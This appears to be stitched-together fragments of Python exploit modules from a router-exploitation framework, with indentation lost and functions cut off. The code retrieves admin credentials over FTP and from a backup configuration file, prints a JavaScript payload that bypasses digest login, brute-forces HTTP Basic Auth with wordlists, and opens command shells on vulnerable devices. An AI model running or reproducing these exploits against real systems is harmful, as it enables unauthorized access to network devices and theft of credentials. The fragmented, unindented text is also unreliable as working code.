print_error("Exploit failed - could not find any credentials")
except ftplib.all_errors:
print_error("Exploit failed - FTP error")
return None
def run(self):
if self.check():
print_success("Target is vulnerable")
print_status("Invoking command loop...")
shell(self, architecture="none", method="awk", binary="awk")
else:
print_error("Target is not vulnerable")
def run(self):
response = self.telnet_login()
if 'Login not allowed' in response and self.is_port_opened(self.ftp_port):
print_error("Telnet: {}:{} Authentication through Telnet not allowed".format(self.target, self.telnet_port))
print_status("FTP and HTTP service active")
creds = self.ftp_get_config()
if creds:
print_status("Use javascript console (through developer tools) to bypass authentication:")
payload = ('var user = "******"\n'
'var hash2 = "{}";\n'
'var HA2 = MD5("GET" + ":" + uri);\n'
'document.getElementById("user").value = user;\n'
'document.getElementById("hidepw").value = MD5(hash2 + ":" + nonce +":" + "00000001" + ":" + "xyz" + ":" + qop + ":" + HA2);\n'
'document.authform.submit();\n')
for user in creds:
print_success("User: {} Role: {}".format(user[0], user[2]))
print_info(payload.format(user[0], user[3]))
elif '}=>' in response:
print_success("Successful authentication through Telnet service")
tn = telnetlib.Telnet(self.target, int(self.telnet_port), timeout=10)
tn.read_until(': ')
tn.write(self.remote_user + '\r\n')
tn.read_until(': ')
tn.write(self.remote_pass + '\r\n')
tn.interact()
else:
print_error("Exploit failed - target seems to be not vulnerable")
def attack(self):
url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))
response = http_request(method="GET", url=url)
if response is None:
return
if response.status_code != 401:
print_status("Target is not protected by Basic Auth")
return
if self.usernames.startswith('file://'):
usernames = open(self.usernames[7:], 'r')
else:
usernames = [self.usernames]
if self.passwords.startswith('file://'):
passwords = open(self.passwords[7:], 'r')
else:
passwords = [self.passwords]
collection = LockedIterator(itertools.product(usernames, passwords))
self.run_threads(self.threads, self.target_function, collection)
if len(self.credentials):
print_success("Credentials found!")
headers = ("Target", "Port", "Login", "Password")
print_table(headers, *self.credentials)
else:
print_error("Credentials not found")
def run(self):
if self.check():
print_success("Target is vulnerable")
print_status("Invoking command loop...")
shell(self, architecture="mips")
else:
print_error("Target is not vulnerable")
def run(self):
if self.check():
print_success("Target is vulnerable")
print_status("Invoking command loop...")
self.command_loop()
else:
print_error("Target is not vulnerable")
def run(self):
creds = []
url = "{}:{}/backupsettings.conf".format(self.target, self.port)
response = http_request(method="GET",
url=url,
auth=(self.def_user, self.def_pass))
if response is None:
print_error("Exploit failed")
return
res = re.findall('<AdminPassword>(.+?)</AdminPassword>', response.text)
if len(res):
print_success("Found strings: {}".format(res[0]))
try:
print_status("Trying to base64 decode")
password = base64.b64decode(res[0])
except:
print_error("Exploit failed - could not decode password")
return
creds.append(("admin", password))
print_success("Credentials found!")
print_table(("Login", "Password"), *creds)
else:
print_error("Credentials could not be found")
